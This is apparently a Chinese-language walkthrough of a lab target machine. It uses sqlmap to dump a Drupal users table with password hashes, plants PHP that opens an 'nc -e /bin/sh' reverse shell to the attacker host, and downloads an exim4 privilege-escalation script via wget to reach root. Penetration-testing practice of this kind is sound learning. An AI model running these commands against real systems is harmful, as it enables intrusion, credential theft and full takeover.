扫描主机地址
扫描开放端口
开启80端口,访问
随便点点,发现id值,应该存在注入点
使用sqlmap爆破
python sqlmap.py -u http://192.168.110.136/?nid=1 --dbs
爆破d7db数据库
python sqlmap.py -u http://192.168.110.136/?nid=1 -D d7db --tables
发现users表,列出字段
python sqlmap.py -u http://192.168.110.136/?nid=1 -D d7db -T users --columns
列出指定字段
python sqlmap.py -u http://192.168.110.136/?nid=1 -D d7db -T users -C name,pass --dump
得到两个用户和加密的密码
admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF
使用john破解
破解了好长时间发现只能破解john用户
登录网站
登录后点击上面的Find content,选择Contact Us,后点击Webform -> form settings
,选择PHP code
选择PHP code之后输入代码,点击最下面的Save configuration,kali端监听
<p>GETSHELL</p>
<?php
system("nc -e /bin/sh 192.168.110.11 4567");
?>
保存成功点击Contact Us,输入信息后点击Submit
kali连接成功
python -c 'import pty;pty.spawn("/bin/bash")'
使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限
查看版本
/usr/sbin/exim4 –version
查找漏洞
searchsploit exim
把46996.sh文件拷贝到本地,并改名,然后开启http服务
连接的靶机下载文件
wget http://192.168.110.11:8000/root/123.sh
添加执行权限
chmod +x 123.sh
根据脚本提示执行命令参数
./123.sh -m netcat
找不到文件,可能是脚本的原因。vim打开,:set ff=unix 然后保存退出。靶机重新下载,添加权限,执行
提权成功!